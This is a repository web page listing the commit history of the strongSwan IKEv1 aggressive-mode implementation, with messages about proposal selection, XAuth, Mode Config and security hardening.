ims-volte-vowifi
/
strongswan
9
0
Fork 0
Code Pull Requests Releases Activity
17,224 Commits 6 Branches 233 Tags 88 MiB
Commit Graph

36 Commits

Author SHA1 Message Date
Tobias Brunner c9599d4101 proposal: Extract proposal selection code in ike/child_cfg_t 
Also invert the PREFER_CONFIGURED flag (i.e. make it PREFER_SUPPLIED)
so the default, without flags, is what we preferred so far.
 2019-10-24 17:36:33 +02:00
Thomas Egerer f930b732c4 proposal: Use flags to select/match proposals 
During proposal selection with ike/child_cfgs a couple of boolean
variables can be set (e.g. private, prefer_self, strip_dh). To simplify
the addition of new parameters, these functions now use a set of flags
instead of indiviual boolean values.

Signed-off-by: Thomas Egerer <thomas.egerer@secunet.com>
 2019-10-24 17:22:53 +02:00
Tobias Brunner 4899a4c025 aggressive-mode: Trigger alerts for authentication failures 2018-08-31 11:02:43 +02:00
Tobias Brunner 1b67166921 Unify format of HSR copyright statements 2018-05-23 16:32:53 +02:00
Tobias Brunner 0a954d6789 ike: Add configuration option to switch to preferring supplied proposals over local ones 2016-06-17 18:48:07 +02:00
Tobias Brunner 3a40d572c6 ike-cfg: Add option to prefer supplied proposals over locally configured ones 2016-06-17 18:48:07 +02:00
Andreas Steffen b12c53ce77 Use standard unsigned integer types 2016-03-24 18:52:48 +01:00
Martin Willi 4f243dfaa9 ikev1: Defer Mode Config push after CHILD adoption when using XAuth 2014-08-25 09:55:44 +02:00
Martin Willi 891bbbd4bb ikev1: Defer Mode Config push after CHILD adoption and reauth detection 
When an initiator starts reauthentication on a connection that uses push
mode to assign a virtual IP, we can't execute the Mode Config before releasing
the virtual IP. Otherwise we would request a new and different lease, which
the client probably can't handle. Defer Mode Config execution, so the same IP
gets first released then reassigned during reauthentication.
 2014-08-25 09:55:44 +02:00
Martin Willi 3ecfc83c6b payload: Use common prefixes for all payload type identifiers 
The old identifiers did not use a proper namespace and often clashed with
other defines.
 2014-06-04 15:53:03 +02:00
Tobias Brunner d223fe807a libcharon: Use lib->ns instead of charon->name 2014-02-12 14:34:32 +01:00
Tobias Brunner 9e1ce63915 ikev1: Fix config switching due to failed authentication during Aggressive mode 
The encoded ID payload gets destroyed by the authenticator, which caused
a segmentation fault after the switch.

Fixes #501.
 2014-02-12 13:53:03 +01:00
Martin Willi e3311e9b87 ikev1: implement mode config push mode 2013-09-04 10:33:38 +02:00
Tobias Brunner 8a0a1ae857 Delete IKE_SAs if responder does not initiate XAuth exchange within a certain time frame 2013-03-19 12:00:00 +01:00
Volker Rümelin 0ff8d20a89 Add support for draft-ietf-ipsec-nat-t-ike-03 and earlier 
This adds support for early versions of the draft that eventually
resulted in RFC 3947.
 2012-12-19 11:03:42 +01:00
Martin Willi 497ce2cf51 Support multiple address pools configured on a peer_cfg 2012-08-30 16:43:42 +02:00
Martin Willi 101d26babe Support multiple virtual IPs on peer_cfg and ike_sa classes 2012-08-30 16:43:42 +02:00
Martin Willi cd55a3cb77 Use actual daemon name to enable XAuth/PSK with aggressive mode 2012-08-10 11:53:18 +02:00
Martin Willi 9d2968e272 As a responder, don't start a TRANSACTION request if we expect one from the initiator 2012-06-29 13:40:31 +02:00
Martin Willi 8ff45cfd99 Queue a mode config task as responder if we need a virtual IP 2012-06-27 11:42:56 +02:00
Martin Willi c2a391746c Add basic support for XAuth responder authentication 2012-06-27 11:42:56 +02:00
Martin Willi 0c32b9c62f Enforce uniqueids=keep only for non-XAuth Main/Agressive Modes 2012-06-25 10:18:35 +02:00
Martin Willi b31a56f128 Require a scary option to respond to Aggressive Mode PSK requests 
While Aggressive Mode PSK is widely used, it is known to be subject
to dictionary attacks by passive attackers. We don't complain as
initiator to be compatible with existing (insecure) setups, but
require a scary strongswan.conf option if someone wants to use it
as responder.
 2012-06-14 10:25:48 +02:00
Martin Willi e5f0f9ff96 Enforce uniqueness policy in IKEv1 main and aggressive modes 2012-06-08 16:15:22 +02:00
Tobias Brunner 647cd741e8 Added support for IKEv1 IPComp proposals in SA payload. 2012-05-24 15:32:28 +02:00
Martin Willi 3c475660c5 Apply IDir before deriving keys as aggressive initiator 2012-05-23 12:27:47 +02:00
Tobias Brunner 1a624ff45a Switch to alternative peer config in IKEv1 Main and Aggressive Mode. 2012-05-21 15:49:25 +02:00
Martin Willi 7ce504e182 Flush task queues explicitly, not implicitly if task returns ALREADY_DONE 2012-05-21 14:17:09 +02:00
Tobias Brunner 7a56c35fc9 Remove executable flag from source files. 2012-05-18 10:04:08 +02:00
Martin Willi 3624b09e21 Set selected proposal on IKEv1 SA, don't pass it separately to Phase 1 helper 2012-03-20 17:31:37 +01:00
Martin Willi f420f51f55 Invoke authorization hooks for IKEv1 connections 2012-03-20 17:31:36 +01:00
Martin Willi 2ddd45c9a7 Simplified DPD handling by using a task for a single message only 2012-03-20 17:31:35 +01:00
Clavister OpenSource 3e6b740336 Isakmp_dpd task added. 2012-03-20 17:31:35 +01:00
Martin Willi 37c12bd31e Streamlined debug output when initiating IKEv1 IKE_SAs 2012-03-20 17:31:34 +01:00
Martin Willi 91c212fd6a Select IKEv1 configurations by main/aggressive mode option 2012-03-20 17:31:34 +01:00
Martin Willi ee325b555f Implemented aggressive mode using Phase 1 helper class 2012-03-20 17:31:33 +01:00